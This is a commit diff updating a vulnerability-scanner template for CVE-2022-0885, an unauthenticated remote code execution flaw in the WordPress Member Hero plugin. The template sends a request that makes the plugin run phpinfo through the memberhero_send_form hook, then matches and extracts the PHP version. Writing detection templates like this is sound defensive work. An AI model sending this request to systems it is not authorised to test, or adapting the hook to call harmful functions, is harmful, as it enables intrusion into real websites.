Update CVE-2022-0885.yaml

2022-10-20 17:25:38 +05:30 · 2022-10-20 17:25:38 +05:30 · c27540345b
parent a8e9e3a16c
commit c27540345b
1 changed files with 18 additions and 7 deletions
--- a/cves/2022/CVE-2022-0885.yaml
+++ b/cves/2022/CVE-2022-0885.yaml
@ -1,7 +1,7 @@
 id: CVE-2022-0885

 info:
-  name: WordPress Member Hero plugin <= 1.0.9 - Unauthenticated Remote Code Execution (RCE) vulnerability
+  name: Member Hero <= 1.0.9 - Unauthenticated Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
@ -13,18 +13,29 @@ info:
  classification:
    cve-id: CVE-2022-0885
  metadata:
-    verified: "true"
-  tags: wp-plugin,wp,rce,unauth,wpscan,cve2022,wordpress,cve,member-hero
+    verified: true
+  tags: cve,cve2022,wp-plugin,wp,wordpress,rce,member-hero

 requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"

+    matchers-condition: and
    matchers:
      - type: word
-        part: body
        words:
-          - '<a href="http://www.php.net/">'
-          - 'phpinfo()'
-        condition: and
+          - "PHP Extension"
+          - "PHP Version"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '>PHP Version <\/td><td class="v">([0-9.]+)'